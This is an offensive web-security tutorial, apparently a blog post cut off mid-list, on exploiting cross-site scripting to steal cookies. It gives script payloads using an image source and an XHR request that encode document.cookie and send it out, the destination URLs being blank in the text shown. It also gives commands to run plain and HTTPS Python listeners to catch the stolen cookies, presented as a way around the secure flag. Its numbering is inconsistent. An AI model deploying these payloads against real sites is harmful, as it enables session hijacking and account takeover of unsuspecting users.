Exploiting XSS-stealing cookies, csrf

4 min readMar 31, 2022

Cookie Stealing-

(Note: HttpOnly should not be enabled/present in cookie header)

  1. Classic way-
<script>var i=new Image(); i.src=""+btoa(document.cookie);</script>

Here we have used btoa() method for converting the cookie string into base64 encoded string.

python3 -m http.server -m 80

2. Bypassing secure flag protection-

a) Creating a HTTPS server-

openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodes

Generating certificate.

import http.server, ssl
server_address = ('', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,server_side=True,certfile='localhost.pem')

Starting web server.

2. Via XHR-

var xhr=new XMLHttpRequest(); 
xhr.open("GET", ""+document.cookie, true);

3. Fetch api

Redirecting User to malicious websites-


Accessing internal…